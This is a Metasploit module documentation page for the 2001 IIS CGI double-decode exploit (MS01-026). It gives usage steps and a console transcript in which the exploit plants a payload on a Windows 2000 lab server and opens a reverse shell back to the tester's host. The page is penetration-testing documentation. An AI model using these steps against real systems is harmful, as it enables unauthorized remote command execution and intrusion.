CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/iis/ms01_026_dbldecode.md
Views: 11789

Vulnerable Application

This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001.

This module has been tested successfully on:

  • Windows 2000 Professional (SP0) (EN)

  • Windows 2000 Professional (SP1) (AR)

  • Windows 2000 Professional (SP1) (CZ)

  • Windows 2000 Server (SP0) (FR)

  • Windows 2000 Server (SP1) (EN)

  • Windows 2000 Server (SP1) (SE)

Note: This module will leave a Metasploit payload in the IIS scripts directory.

Verification Steps

  1. use exploit/windows/iis/ms01_026_dbldecode

  2. set RHOSTS [IP]

  3. set PAYLOAD windows/shell/reverse_tcp

  4. set LHOST [IP]

  5. run

Options

WINDIR

The Windows directory name of the target host. The directory name will be detected automatically if not set.

DEPTH

Traversal depth to reach the drive root (default: 2)

Scenarios

Windows 2000 Server (SP0) (FR)

msf6 > use exploit/windows/iis/ms01_026_dbldecode
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
rhosts => 192.168.200.175
msf6 exploit(windows/iis/ms01_026_dbldecode) > check
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms01_026_dbldecode) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using Windows directory "winnt"
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
[*] Command Stager progress -  66.67% done (40/60 bytes)
[*] Command Stager progress - 100.00% done (60/60 bytes)
[*] Triggering payload "qQErEZeB.exe" via a direct request...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.175
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
          

c:\inetpub\scripts>hostname
hostname
win2k-srv-fr